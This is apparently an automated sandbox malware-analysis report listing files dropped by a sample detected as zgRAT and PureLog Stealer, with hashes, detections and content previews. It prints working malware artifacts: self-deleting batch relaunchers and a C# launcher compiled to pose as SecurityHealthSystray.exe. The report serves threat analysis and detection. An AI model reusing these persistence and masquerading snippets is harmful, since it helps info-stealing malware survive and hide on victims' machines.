Preview:	1U0OxE89EptfheBp4e7ivW4E2tKm9jmzKI97sGt8cSPd5u3SFQOEifHfavVD3W9eC3UYeD7xu9GdHaJIz1htViQoAeh6uqEFSubBaeyBTaTjZoX9mNNCyQIempX9gBCE4AKW9HrUDfZ5OqPWGhThcCRCm7ZuHyeSXPpYeBAff28S0MP5ZB29rfm2tItCr7NPBHi9B11FgxBjD8LZrdUF5fk1nwoWS8xiptRtoQ3iKxc3eCzu6UUOnITggqWPNewi9d4Trcubjw5HCqXk63a7nj4havM83oUpA33AIfDej3p0MLdzTvSTEz5aiX36Pwh5bQHJwWcb05Yu4DUORWoIVBkL7dculGOxVuZ6ETD6S1cJaLgeDoo2HZjZp5LT4szurlYKoXK8Tszeibvw67r7cVp6K9QIItCkBsbzxW0pdqjZjE1OKZX7A2RV5c9oHBzkqOc0958jHCdvwQWFIB8tWEkJaG3VXLic09tUmAPOax08YfipF3gFDGOloSZ2BnM5dB5xgBdHwtSiOmv5hNPdocYuvHqUlXMwl4eXkvIDaYTTypWCheUyXsQAmLCZVJgZgf6UHXUwEMDQJF5FvowHCYY3ndvZstsR24wStC4JJhtLpA1gP7orWYWHGDqom5DUdvXPTnWstn7epNNmmOKvFB5ehoLpVQgOeYr3nlNll57ta2c3zDCYuSPc03rpbqWcGtARfU9ABiKKDLDpMSzSOIdMJPCu4iK4ifmr1KYfEBWMHFZozCcJ1EO8QyIQRPGdYQlijWxB4TOMvQEDzY41FADeQoaDCIOz53x1d1FdObPh0BM9tEa3UOYXMGR55t9wFYR1cNk8SbnnvfoPbbU7rVeqfaoXjKhebcbbuUggebk2lumrcCdeZCEu3kWC

C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LBUPSPkYsNXrxZEtdVzCng.exe.log

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulxmH/lZ:NllUg
MD5:	D904BDD752B6F23D81E93ECA3BD8E0F3
SHA1:	026D8B0D0F79861746760B0431AD46BAD2A01676
SHA-256:	B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
SHA-512:	5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
Malicious:	false
Preview:	@...e................................. ..............@..........

C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150
Entropy (8bit):	5.097765085776852
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG10nacwRE2J5xAIunNyMH:hCRLuVFOOr+DE74vKOZG1cNwi23fMNZH
MD5:	3AE6B652E61E50FCC65BC785686E2589
SHA1:	CE996CC29ECA02194D4E947D077BAEAEA2CB3C38
SHA-256:	81541C09E086A112B2BBBEDA30A92C1834A01BCCF6437A33AE8DD6008F8502B3
SHA-512:	7CAFB3462469482D46BABBC6FC83AFC6C558094977EDFF6D75CC23D1FFDAC8AAE6CD1CF859E6B9EDCA60501ACC4A6952EE452E5C27D1945D0980A0A238234F64
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Cb8ciTnPhW.bat"

C:\Users\user\AppData\Local\Temp\MZI4IMSDMe

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774724
Encrypted:	false
SSDEEP:	3:yEm8+Ue7:y78i7
MD5:	1ACD0061BEA6E2BEE885ACEE1C74EFC3
SHA1:	E594B98F4D8F7BE8FC660455230D9E37A4E74EB0
SHA-256:	FC9217C83542259083A3C46116257315E931735A5C3566606062FAFCE707ECEF
SHA-512:	1EB3FF6C41A783275DE7730D13E9D7F3DE8A309B48F9D862E792B4ED515A52B2A1D75E663D499A070A7300E4ABEB5592E4D2741542B28E71925DFD3334051E2A
Malicious:	false
Preview:	G4xcQumFux75gqCEZYrhJ8d8R

C:\Users\user\AppData\Local\Temp\MtokzTv6OV

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:0je+yag1:8Xw
MD5:	F3E6F8EB5C2B3C9F8D5902181CF2D87B
SHA1:	B9B661A5932A34AEAE194A3580C28E48B0E9D7C6
SHA-256:	175DD9BFADB55EF0F8FBFD9B9C771CC2D4060D19496C59B22A48CB319A3C9A6F
SHA-512:	0F099427B6EBB711004978EC4FA39414BE7D221E2A0C39D4A70BDEB1CC809E7B2F5139286E821554CAB9973524D7CE4F136F094F8BD86BE1BF1E1B1025F3B192
Malicious:	false
Preview:	GtB0nVk1TxtwCKNcLWuZDXg0z

C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	239
Entropy (8bit):	5.247312636792359
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1cNwi23JA2ELvSmvKOZG1cNwi23fd1sH:HTg9uYDEVZ9EWZjm
MD5:	7979389FC8559212B88F8EEF3EE75E4A
SHA1:	AA1FB9265A05CA93524089A5C7526EEC49E3A58D
SHA-256:	08B22DB010A3E4DB6A749E4B9742C94A34735BBF59E5DFC00075E491364C4898
SHA-512:	40C3D69D499113D5E68B0E55B242856794C95F1C45BFE4D8976F56371EC2CDA008F2D48B2E8670C8CF94B7528157A61FD696DC38AEB22B0618A7B7A2E8183FAB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\NnkzcdwAFb.bat"

C:\Users\user\AppData\Local\Temp\RESC82C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Mon Sep 30 19:32:39 2024, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1916
Entropy (8bit):	4.601630597970278
Encrypted:	false
SSDEEP:	24:H8e9s0aLzctOxnZHyYwK80N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:LaLzcanZKK80klmuulB+hnqXSfbNtmhP
MD5:	FB9028984FA031CF88E6B2CF66A4649D
SHA1:	970EEDFBFC11FAB51FA6DE66CE21A2356DBFA2E4
SHA-256:	DCDFCCCD1DEEB4773FC33BE1ECED0C85CE3B36E76BAB28944F662EAE91490397
SHA-512:	843286D0FD13C74EF55A5E0AEB91020FA4E95F68A2BB5CBC4999DCFC6D919838F72E0992DF78B1F1EA5836025EA4A89CCEE988D14D95343D914D887BD03918BD
Malicious:	false
Preview:	L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.

C:\Users\user\AppData\Local\Temp\RESC9D2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6dc, 10 symbols, created Mon Sep 30 19:32:39 2024, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1940
Entropy (8bit):	4.557717932254492
Encrypted:	false
SSDEEP:	24:H0PW9WXOaIXsZHHwK80NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+AlUZ:aQYZwK80MluOulajfqXSfbNtmhFZ
MD5:	0CFCF137D9968550EDC5A6C210CFE825
SHA1:	28634397A0D7ED81E4AE2924B2DBB30FDFB123A7
SHA-256:	53B038A07A2E36D9A3084039E2F1253CD5956528D953920611B4DCA03D7BB874
SHA-512:	525A47D6383475BE6E55481487D7F5996740A85B399253C64316B1A42987F09DC11BFF5273A2E1489499574F78A116ED6FAB737B6DB007E7823D0A7E67A14C78
Malicious:	false
Preview:	L......f.............debug$S........,...................@..B.rsrc$01................X...........@..@.rsrc$02........p...l...............@..@........<....c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.

C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	198
Entropy (8bit):	5.091505143963069
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE74vKOZG1cNwi23fiPj4H:HTg9uYDE3ZaP2
MD5:	F29C75FF9E71808FBCA6A7F9CB552252
SHA1:	AB0DDB2FB630282F025C74BD1ED1684CF0B79A1F
SHA-256:	BB3FA09E221FF3549E039CBCA206FBE33777D4716A5C986AA56C9BA472D01065
SHA-512:	62D1191960A268357EB79D283F52969C245E9D29684A8B4785EB8276D40A819406D15D6B2ACD1E31758D3FB31EC2D88E2EC1EFC48ACA2E8371339557F6D87932
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\W7vO5ocqvr.bat"

C:\Users\user\AppData\Local\Temp\Y030TevGIO

Download File

Process:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:53MDHqEKn:paHqVn
MD5:	3975DC84D3405DB75E962D9548067AF7
SHA1:	3A5145CF968ECE957F34E297A29165EFA54C0401
SHA-256:	BA7C8FAE6E2DD88B0F1538718FA5517048282C9AB3B48F92A456632E3528D404
SHA-512:	346BB8570634A0797F497AA6F967F5EF042532A3572D8430D73AAC87BA7CF46D6CDAC8BAC55CBFA4224BC9F1D8567BF5025533AFE20E846A21F0C1B4C7D21645
Malicious:	false
Preview:	a5RisVS2EKrc5E5oqBg6ahTS4

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1l0zhxgd.52m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0wbq4zt.2pz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmp1mrbk.vvl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lthqt3up.q31.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mp4rx0rd.3el.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbd5cpwu.yyb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgif32cu.pxw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukahy1si.yrh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	406
Entropy (8bit):	5.074232246568697
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLAZ9EeiFkD:JNVQIbSfhV7TiFkMSfhs9E/FkD
MD5:	F4D2939E9C4EFDB64721F442C43E30F4
SHA1:	736790F2C43A3540DEBBB5AAC957AD3C0FCF2953
SHA-256:	7801DB3A8A0D46179E04236581672751C4D484ECA085AEFBE01AB8DE6FC9321A
SHA-512:	415558BB0C2B2F8C4938E31A2BC3C9D593EC7DB34A71AB91CEEB09B95042E47FA3A15B5A23042703D3B73710C99D33770059B4854647EDDC35BA19B44076C565
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	254
Entropy (8bit):	5.124016607736197
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fUm:Hu7L//TRq79cQlZX
MD5:	F2ADE908BD12C38E559CB1724D69F57A
SHA1:	99C6B98729CC9EA58ACE8B49062795BFCB92F940
SHA-256:	F5B58254C72A97A2CBE40D207E8FA50E60876B0E1E4E40468BEBEC464EB0F3DC
SHA-512:	379CA7139BF97E3B92CFAC1C5B05FE778D8EF7D149FC97822DE2748EE7DF65D4CD80E2FBE46FA7244CA88B9C4A1879ACC672CF0E4021DE9623F7BA3567D7E0CE
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.0.cs"

C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (318), with CRLF, CR line terminators
Category:	modified
Size (bytes):	739
Entropy (8bit):	5.267654570677332
Encrypted:	false
SSDEEP:	12:apI/u7L//TRq79cQlZeKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDeKax5DqBVKVrdFAMBJj
MD5:	79DE9C0113EC32DBDC2944293614D9F2
SHA1:	F56E4DC98445F6019F3F3BD517DE83248F43FB49
SHA-256:	D95E89490EB4F81625F11C527EEDAB48E15ABBB10A697AF46CE1DC68725B21BD
